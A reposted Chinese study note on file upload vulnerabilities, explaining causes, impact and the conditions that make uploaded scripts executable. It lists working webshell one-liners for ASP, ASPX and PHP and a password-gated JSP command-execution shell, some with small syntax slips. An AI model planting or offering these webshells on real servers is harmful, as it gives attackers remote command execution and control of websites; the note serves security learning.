GCsec学习(3)
2022/8/6 23:25:11
本文主要是介绍GCsec学习(3),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
目录- 文件上传
- 文件上传漏洞
文件上传
文件上传漏洞
简介:现代互联网的Web应用程序中,上传文件是一种常见的功能,因为它有助于提高业务效率,如果Web应用存在文件上传漏洞,那么恶意用户就可以利用文件上传漏洞将可执行脚本程序(WebShell)上传到服务器中,获得网站的权限,然后可以进一步对服务器进行入侵,扩大控制权限。
漏洞产生原因:
上传文件时,如果服务器端没有对客户端上传的文件进行严格的检验或过滤,就容易造成可上传任意文件的情况,包括上传脚本文件(asp,aspx,php,jsp)
漏洞的危害:
非法用户可以利用上传的脚本文件控制整个网站,甚至控制服务器。这个恶意的脚本文件,又被称为WebShell,也可将WebShell脚本称为一种网页后门,WebShell脚本具有非常强大的功能,比如查看服务器目录、服务器中的文件,执行系统命令等。
- ASP
<%eval request("x")%>//密码是‘x’ <%execute request("x")%>
- ASPX
<%@ Page Language="Jscript"%><%eval(Request.Item["x"],"unsafe");%>
- PHP
<?php eval($_POST['x'])?> //比较标准的用法;不一定是post,也可以是get <?php assert($_POST['x'];?)> //php版本>7时不能用了
- JSP CMD WebShall
<% if("x".equals(request.getParameter("pwd"))) { java.io.InputStream in=Runtime.getRuntime().exec(request.getParameter("i")).getInp int a=-1; byte[] b=new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1) { out.println(new String(b)); } out.print("</pre>"); } %>
*文件上传漏洞的条件
首先,上传的文件能够被Web容器解释执行。所以文件上传后所在的目录要是Web容器所覆盖到的路径
其次,用户能够从Web上访问这个文件。如果文件上传了,但用户无法通过Web访问,或者无法使得Web容器解释这个脚本,那么也就不能被称之为漏洞
最后,用户上传的文件若被安全检查、格式化、图片压缩等功能改变了内容,也可能导致攻击不成功
这篇关于GCsec学习(3)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-04-16软路由代理问题, tg 无法代理问题-icode9专业技术文章分享
- 2024-04-16程序猿用什么锅-icode9专业技术文章分享
- 2024-04-16自建 NAS 的方案-icode9专业技术文章分享
- 2024-04-14ansible 在远程主机上执行脚本,并传入参数-icode9专业技术文章分享
- 2024-04-14ansible 在远程主机上执行脚本,并传入参数, 加上remote_src: yes 配置-icode9专业技术文章分享
- 2024-04-14ansible 检测远程主机的8080端口,如果关闭,则echo 进程已关闭-icode9专业技术文章分享
- 2024-04-14result 成功怎么写-icode9专业技术文章分享
- 2024-04-14stopped 状态设置为变量,由外部传递进来-icode9专业技术文章分享
- 2024-04-14为什么ansible执行远程脚本需要放到后台-icode9专业技术文章分享
- 2024-04-14shell 正则判断字符串内是否含有th-icode9专业技术文章分享